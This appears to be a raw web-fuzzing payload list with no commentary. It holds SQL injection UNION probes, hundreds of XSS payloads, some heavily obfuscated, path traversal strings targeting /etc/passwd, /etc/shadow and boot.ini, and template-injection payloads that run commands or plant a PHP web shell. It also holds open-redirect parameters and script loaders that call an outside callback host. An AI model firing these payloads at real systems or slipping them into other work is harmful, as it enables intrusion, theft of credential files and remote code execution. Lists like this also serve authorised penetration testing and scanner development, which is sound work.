UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX'# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
<script>alert('XSS')</script> | |
<scr<script>ipt>alert('XSS')</scr<script>ipt> | |
"><script>alert('XSS')</script> | |
"><script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=x onerror=alert('XSS');> | |
<img src=x onerror=alert(String.fromCharCode(88,83,83));> | |
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> | |
<img src=x:alert(alt) onerror=eval(src) alt=xss> | |
"><img src=x onerror=alert('XSS');> | |
"><img src=x onerror=alert(String.fromCharCode(88,83,83));> | |
<svgonload=alert(1)> | |
<svg/onload=alert('XSS')> | |
<svg/onload=alert(String.fromCharCode(88,83,83))> | |
<svg id=alert(1) onload=eval(id)> | |
"><svg/onload=alert(String.fromCharCode(88,83,83))> | |
"><svg/onload=alert(/XSS/) | |
<body onload=alert(/XSS/.source)> | |
<input autofocus onfocus=alert(1)> | |
<select autofocus onfocus=alert(1)> | |
<textarea autofocus onfocus=alert(1)> | |
<keygen autofocus onfocus=alert(1)> | |
<video/poster/onerror=alert(1)> | |
<video><source onerror="javascript:alert(1)"> | |
<video src=_ onloadstart="alert(1)"> | |
<details/open/ontoggle="alert`1`"> | |
<audio src onloadstart=alert(1)> | |
<marquee onstart=alert(1)> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh> | |
data:text/html,<script>alert(0)</script> | |
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ | |
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e | |
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> | |
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | |
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> | |
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* | |
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a | |
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ | |
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* | |
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* | |
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// | |
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* | |
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* | |
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* | |
javascript://--></title></style></textarea></script><svg "//' onclick=alert()// | |
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* | |
<object onafterscriptexecute=confirm(0)> | |
<object onbeforescriptexecute=confirm(0)> | |
<script>window['alert'](document['domain'])<script> | |
<img src='1' onerror/=alert(0) /> | |
<script>window['alert'](0)</script> | |
<script>parent['alert'](1)</script> | |
<script>self['alert'](2)</script> | |
<script>top['alert'](3)</script> | |
"><svg onload=alert(1)// | |
"onmouseover=alert(1)// | |
"autofocus/onfocus=alert(1)// | |
'-alert(1)-' | |
'-alert(1)// | |
\'-alert(1)// | |
</script><svg onload=alert(1)> | |
<x contenteditable onblur=alert(1)>lose focus! | |
<x onclick=alert(1)>click this! | |
<x oncopy=alert(1)>copy this! | |
<x oncontextmenu=alert(1)>right click this! | |
<x oncut=alert(1)>copy this! | |
<x ondblclick=alert(1)>double click this! | |
<x ondrag=alert(1)>drag this! | |
<x contenteditable onfocus=alert(1)>focus this! | |
<x contenteditable oninput=alert(1)>input here! | |
<x contenteditable onkeydown=alert(1)>press any key! | |
<x contenteditable onkeypress=alert(1)>press any key! | |
<x contenteditable onkeyup=alert(1)>press any key! | |
<x onmousedown=alert(1)>click this! | |
<x onmousemove=alert(1)>hover this! | |
<x onmouseout=alert(1)>hover this! | |
<x onmouseover=alert(1)>hover this! | |
<x onmouseup=alert(1)>click this! | |
<x contenteditable onpaste=alert(1)>paste here! | |
<script>alert(1)// | |
<script>alert(1)<!– | |
<script src=//brutelogic.com.br/1.js> | |
<script src=//3334957647/1> | |
%3Cx onxxx=alert(1) | |
<%78 onxxx=1 | |
<x %6Fnxxx=1 | |
<x o%6Exxx=1 | |
<x on%78xx=1 | |
<x onxxx%3D1 | |
<X onxxx=1 | |
<x OnXxx=1 | |
<X OnXxx=1 | |
<x onxxx=1 onxxx=1 | |
<x/onxxx=1 | |
<x%09onxxx=1 | |
<x%0Aonxxx=1 | |
<x%0Conxxx=1 | |
<x%0Donxxx=1 | |
<x%2Fonxxx=1 | |
<x 1='1'onxxx=1 | |
<x 1="1"onxxx=1 | |
<x </onxxx=1 | |
<x 1=">" onxxx=1 | |
<http://onxxx%3D1/ | |
<x onxxx=alert(1) 1=' | |
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> | |
'onload=alert(1)><svg/1=' | |
'>alert(1)</script><script/1=' | |
*/alert(1)</script><script>/* | |
*/alert(1)">'onload="/*<svg/1=' | |
`-alert(1)">'onload="`<svg/1=' | |
*/</script>'>alert(1)/*<script/1=' | |
<script>alert(1)</script> | |
<script src=javascript:alert(1)> | |
<iframe src=javascript:alert(1)> | |
<embed src=javascript:alert(1)> | |
<a href=javascript:alert(1)>click | |
<math><brute href=javascript:alert(1)>click | |
<form action=javascript:alert(1)><input type=submit> | |
<isindex action=javascript:alert(1) type=submit value=click> | |
<form><button formaction=javascript:alert(1)>click | |
<form><input formaction=javascript:alert(1) type=submit value=click> | |
<form><input formaction=javascript:alert(1) type=image value=click> | |
<form><input formaction=javascript:alert(1) type=image src=SOURCE> | |
<isindex formaction=javascript:alert(1) type=submit value=click> | |
<object data=javascript:alert(1)> | |
<iframe srcdoc=<svg/onload=alert(1)>> | |
<svg><script xlink:href=data:,alert(1) /> | |
<math><brute xlink:href=javascript:alert(1)>click | |
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | |
<html ontouchstart=alert(1)> | |
<html ontouchend=alert(1)> | |
<html ontouchmove=alert(1)> | |
<html ontouchcancel=alert(1)> | |
<body onorientationchange=alert(1)> | |
"><img src=1 onerror=alert(1)>.gif | |
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> | |
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; | |
<script src="data:,alert(1)// | |
"><script src=data:,alert(1)// | |
<script src="//brutelogic.com.br/1.js# | |
"><script src=//brutelogic.com.br/1.js# | |
<link rel=import href="data:text/html,<script>alert(1)</script> | |
"><link rel=import href=data:text/html,<script>alert(1)</script> | |
<base href=//0> | |
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) | |
<body onload=alert(1)> | |
<body onpageshow=alert(1)> | |
<body onfocus=alert(1)> | |
<body onhashchange=alert(1)><a href=#x>click this!#x | |
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x | |
<body onscroll=alert(1)><br><br><br><br> | |
<body onresize=alert(1)>press F12! | |
<body onhelp=alert(1)>press F1! (MSIE) | |
<marquee onstart=alert(1)> | |
<marquee loop=1 width=0 onfinish=alert(1)> | |
<audio src onloadstart=alert(1)> | |
<video onloadstart=alert(1)><source> | |
<input autofocus onblur=alert(1)> | |
<keygen autofocus onfocus=alert(1)> | |
<form onsubmit=alert(1)><input type=submit> | |
<select onchange=alert(1)><option>1<option>2 | |
<menu id=x contextmenu=x onshow=alert(1)>right click me! | |
<script>\u0061\u006C\u0065\u0072\u0074(1)</script> | |
<img src="1" onerror="alert(1)" /> | |
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> | |
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> | |
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+
[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> | |
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> | |
<script>$=1,alert($)</script> | |
<script ~~~>confirm(1)</script ~~~> | |
<script>$=1,\u0061lert($)</script> | |
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> | |
<</script/script><script ~~~>\u0061lert(1)</script ~~~> | |
</style></scRipt><scRipt>alert(1)</scRipt> | |
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)> | |
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> | |
<svg><x><script>alert('1')</x> | |
<iframe src=""/srcdoc='<svg onload=alert(1)>'> | |
/.../.../.../.../.../ | |
\…..\\\…..\\\…..\\\ | |
%00../../../../../../etc/passwd | |
%00/etc/passwd%00 | |
%00../../../../../../etc/shadow | |
%00/etc/shadow%00 | |
%0a/bin/cat%20/etc/passwd | |
%0a/bin/cat%20/etc/shadow | |
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 | |
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 | |
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 | |
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini | |
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini | |
/../../../../../../../../%2A | |
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini | |
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | |
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow | |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd | |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow | |
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed | |
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd | |
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow | |
=3D “/..†. “%2f.. | |
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini | |
admin/access_log | |
/admin/install.php | |
../../../administrator/inbox | |
/apache2/logs/access_log | |
/apache2/logs/access.log | |
/apache2/logs/error_log | |
/apache2/logs/error.log | |
/apache/logs/access_log | |
/apache/logs/access.log | |
../../../../../apache/logs/access.log | |
../../../../apache/logs/access.log | |
../../../apache/logs/access.log | |
../../apache/logs/access.log | |
../apache/logs/access.log | |
/apache/logs/error_log | |
/apache/logs/error.log | |
../../../../../apache/logs/error.log | |
../../../../apache/logs/error.log | |
../../../apache/logs/error.log | |
../../apache/logs/error.log | |
../apache/logs/error.log | |
/apache\php\php.ini | |
\\'/bin/cat%20/etc/passwd\\' | |
\\'/bin/cat%20/etc/shadow\\' | |
/.bash_history | |
/.bash_profile | |
/.bashrc | |
/../../../../../../../../bin/id| | |
/bin/php.ini | |
/boot/grub/grub.conf | |
/./././././././././././boot.ini | |
/../../../../../../../../../../../boot.ini | |
/..\../..\../..\../..\../..\../..\../boot.ini | |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini | |
..//..//..//..//..//boot.ini | |
../../../../../../../../../../../../boot.ini | |
../../boot.ini | |
..\../..\../..\../..\../boot.ini | |
..\../..\../boot.ini | |
..\..\..\..\..\..\..\..\..\..\boot.ini | |
\..\..\..\..\..\..\..\..\..\..\boot.ini | |
{$smarty.version} | |
{php}echo `id`;{/php} | |
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} | |
/../../../../../../../../../../../boot.ini%00 | |
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} | |
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} | |
${"freemarker.template.utility.Execute"?new()("id")} | |
../../../../../../../../../../../../boot.ini%00 | |
{{ someString.toUPPERCASE() }} | |
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }} | |
/$collabplz | |
?targetOrigin=$collabplz | |
?fallback=$collabplz | |
?query=$collabplz | |
?redirection_url=$collabplz | |
?next=$collabplz | |
?ref_url=$collabplz | |
?state=$collabplz | |
?l=$collabplz | |
?redirect_uri=$collabplz | |
?forum_reg=$collabplz | |
?return_to=$collabplz | |
?redirect_url=$collabplz | |
?return_url=$collabplz | |
?host=$collabplz | |
?url=$collabplz | |
?redirectto=$collabplz | |
?return=$collabplz | |
?prejoin_data=$collabplz | |
?callback_url=$collabplz | |
?path=$collabplz | |
?authorize_callback=$collabplz | |
?email=$collabplz | |
?origin=$collabplz | |
?continue=$collabplz | |
?domain_name=$collabplz | |
?redir=$collabplz | |
?wp_http_referer=$collabplz | |
?endpoint=$collabplz | |
?shop=$collabplz | |
?qpt_question_url=$collabplz | |
?checkout_url=$collabplz | |
?ref_url=$collabplz | |
?redirect_to=$collabplz | |
?succUrl=$collabplz | |
?file=$collabplz | |
?link=$collabplz | |
?referrer=$collabplz | |
?recipient=$collabplz | |
?redirect=$collabplz | |
?u=$collabplz | |
?hostname=$collabplz | |
?returnTo=$collabplz | |
?return_path=$collabplz | |
?image=$collabplz | |
?requestTokenAndRedirect=$collabplz | |
?retURL=$collabplz | |
?next_url=$collabplz | |
<pre>{% debug %}</pre> | |
{% debug %} | |
{{ [].class.base.subclasses() }} | |
{{''.class.mro()[1].subclasses()}} | |
{{ ''.__class__.__mro__[2].__subclasses__() }} | |
..\..\..\..\..\..\..\..\..\..\boot.ini%00 | |
/../../../../../../../../../../../boot.ini%00.html | |
/../../../../../../../../../../../boot.ini%00.jpg | |
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd | |
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini | |
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd | |
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow | |
c:\apache\logs\access.log | |
c:\apache\logs\error.log | |
{{dump(app)}} | |
{{app.request.server.all|join(',')}} | |
"{{'/etc/passwd'|file_excerpt(1,30)}}"@ | |
{{self}} | |
{{_self.env.setCache("ftp://$collabplz:21")}}{{_self.env.loadTemplate("backdoor")}} | |
